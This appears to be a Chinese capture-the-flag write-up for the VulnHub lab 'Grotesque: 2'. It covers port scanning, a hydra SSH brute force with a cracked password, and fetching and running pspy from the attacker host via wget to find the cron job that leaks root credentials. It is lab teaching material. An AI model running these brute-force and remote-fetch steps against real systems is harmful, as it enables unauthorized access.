简介:获取标志(难度: 中等)

1、下载靶场

靶机名称:GROTESQUE: 2

下载地址:

Grotesque: 2 ~ VulnHub

2、安装靶场

以DC-1为例,将文件解压(一压缩包形式进行下载)。

打开虚拟机,选择解压好的文件导入虚拟机( vof 版本高于4.0,点击重试即可导入)

导入成功,开启此虚拟机( 当页面出现 grotesque login 时表示安装成功)。

3、获取靶机的flag(两个flag)

前提:

1、已知kali的IP地址(ifconfig)

—— kali IP地址:192.168.108.129/24

2、grotesque和kali在同一网段 | 已知grotesque所在的网段

—— grotesque  IP地址:192.168.108.157/24

信息收集

获取grotesque的IP地址

命令:netdiscover -r 192.168.108.157/24

由图可知grotesque的IP地址是:192.168.108.157/24

端口扫描

命令:nmap -sV -p- -O 192.168.108.157

//-sV:扫描系统版本和程序版本号检测,-p-:全端口扫描

很奇怪,这个靶机开了500+个都端口,随便查看了一下各个端口的服务,,发现显示图片和源代码都是一样的

这里需要进行比对wget去把这些页面下载下来看一下文件是否有区别

for i in {23..556};do wget 192.168.108.157:$i -O index$i;done

按照文件大小进行排序,明显最后一个的大小有问题,查看一下256端口

ls -al | sort

在258都那口获取到提示信息

SSH:satan、raphael、 angel、distress、greed、lust

在第二行的图片上面有了发现,虽然有点费眼睛,但是得到一串hash值

再根据提示将hash-100,最后获得hash:b6e705ea1249e2bb7b01d7dac91cd0b3

通过md5解密(https://www.somd5.com/)获得密码:solomon1

使用密码:solomon1和账号:satan、raphael、angel、distress、greed、lust 对ssh进行暴力破解

hydra -L /root/Desktop/g2_user -p solomon1 ssh://192.168.108.157

获取到一组账号密码(angel、solomon1):

[22][ssh] host: 192.168.108.157   login: angel   password: solomon1

使用账号密码(angel、solomon1)ssh登录之后在当前目录下获取到第一个flag

查看是否存在和sudo提权suid提权

sudo -l

find / -perm -4000 2>/dev/null

上传一个pspy64看一下有什么计划任务

python2 -m SimpleHTTPServer 9999

wget http://192.168.108.129:9999/pspy64s、

chmod 7777 pspy64s

./pspy64s

发现差不多每一分钟就会运行write.sh脚本和check.sh脚本

猜测之前发现 /home/angel/quiet 文件夹中有会多文件会不会就是这个脚本写的

删除quiet目录下所有文件后 ,发现在一分钟左右又会重新写入一堆东西,而且在删除之后发现根目录下新出现一个rootcreds.txt文件

应该是要写文件但是目录满了,所以需要把quiet目录下文件全部删除了才会出现rootcreds.txt文件,查看之后获得了root的密码:sweetchild

使用账号密码(root、sweetchild)切换到root账号,,在root的家目录下发现了第二个flag

靶机16 GROTESQUE: 2相关推荐

  1. 靶机17 GROTESQUE: 3.0.1

    简介:获取标志(难度: 中等) 1.下载靶场 靶机名称:GROTESQUE: 1.0.1 下载地址: Grotesque: 3.0.1 ~ VulnHub 2.安装靶场 以DC-1为例,将文件解压(一 ...

  2. 实现手机来电铃声,通知铃声、警告铃声等音频定制化功能(三,多媒体扫描结果定制处理)

    本篇博文主要是对MediaScanner中endFile方法的处理流程上的重构,以实现需求中的资源区域化定制.处理思路为首先扫描定制分区中的资源,在扫描系统分区下默认资源时判断定制分区西下是否已经存在 ...

  3. sqlserver错误码

    错误 6,000 到 6,999 错误 严重性 是否记录事件 说明 6001 10 否 SHUTDOWN 正在等待 %d 个进程完成. 6004 10 否 用户没有执行此操作的权限. 6005 10 ...

  4. 靶机渗透练习90-Grotesque:1.0.1

    靶机描述 靶机地址:https://www.vulnhub.com/entry/grotesque-101,658/ Description get flags difficulty: medium ...

  5. HA: SHERLOCK 靶机渗透取证

    HA: SHERLOCK 靶机渗透取证 靶机描述: DescriptionHA: Sherlock! This lab is based on the famous investigator's jo ...

  6. Docker配置CTF中的靶机环境

    0x01 前言 之所以整理一篇Docker搭建CTF中的靶机文章,主要是因为最近断断续续遇到需要自己搭建一个服务器端镜像的事,出题或者是部署一些服务,出于安全或者是可移植性的一些考虑,都是需要用到Do ...

  7. 【Vulnhub靶机系列】DC3

    基本信息 Kali:192.168.61.145 DC3:192.168.61.163 实验过程 同样先通过arpscan扫描找出DC3的IP地址 sudo arp‐scan ‐‐interface ...

  8. 全网最详细的渗透测试靶机实操步骤——vulnhub靶机实战(七)IMF【包含了sql注入,文件上传,gif图片木马制作,缓冲区溢出漏洞sploit等诸多知识点的靶机,超多干货】

    靶机地址:https://www.vulnhub.com/entry/imf-1,162/ 靶机难度:中级(CTF) 靶机发布日期:2016年10月30日 靶机描述:欢迎使用" IMF&qu ...

  9. VulnHub1:Jangow: 1.0.1靶机入侵

    VulnHub1:Jangow: 1.0.1靶机入侵 信息搜集: 扫描端口 发现命令执行漏洞 uname 一句话木马 上蚁剑 提权 方法1 方法2 VulnHub1:Jangow: 1.0.1靶机入侵 ...

最新文章

  1. android 数据库索引,SQLite数据库提供警告自动索引(列)升级Android L后
  2. 虚拟dom_通过编写简易虚拟DOM,来学习虚拟DOM 的原理
  3. ACM模板——并查集
  4. 快速WinForm开发
  5. 数据挖掘之关联分析五(序列模式)
  6. 手把手教你编写Logstash插件
  7. 关于Python的一些学习笔记(小白式笔记,持续更新)
  8. JavaScript学习总结(9)——JS常用函数(一)
  9. 推荐系统经典模型 Wide Deep 论文剖析
  10. 数据库表TreeView树的快速生成
  11. 问一个 TCP 连接可以发多少个 HTTP 请求?
  12. 解决使用七牛CDN导致AJAX评论报错{“ERROR”:”GET FROM IMAGE SOURCE FAILED: E405″}
  13. OpenGL学习整理------着色器
  14. html多重阴影,CSS3多重阴影特效
  15. inno setup 修改将程序安装路径写入注册表
  16. 学大伟业Day解题报告
  17. 纯干货!!!Python开发必备!!!70+本图书合集(PDF+源码)
  18. Hexo自动部署到阿里云(Ubantu16.04)【超详细踩坑记录】
  19. 【C语言】—— qsort()函数的使用
  20. 运放单电源与双电源问题探讨

热门文章

  1. nz-zorro 主题切换 动态
  2. 杂记——在开发ByteTalk中遇到的困难以及解决
  3. Greedy search与beam search
  4. python 美团api接口对接_美团券对接API文档
  5. Java练习(十九):编写代码,实现AOP的@Around操作 (两种写法)
  6. Spring为什么这么火 之 Spring蕴含的设计思想
  7. 摄像头工作原理及结构介绍(一)
  8. 妞,你给爷听好了...
  9. GDAL库扩展Landsat系列MTL文件格式支持
  10. Linux系统配置文件 /etc/sysconfig详解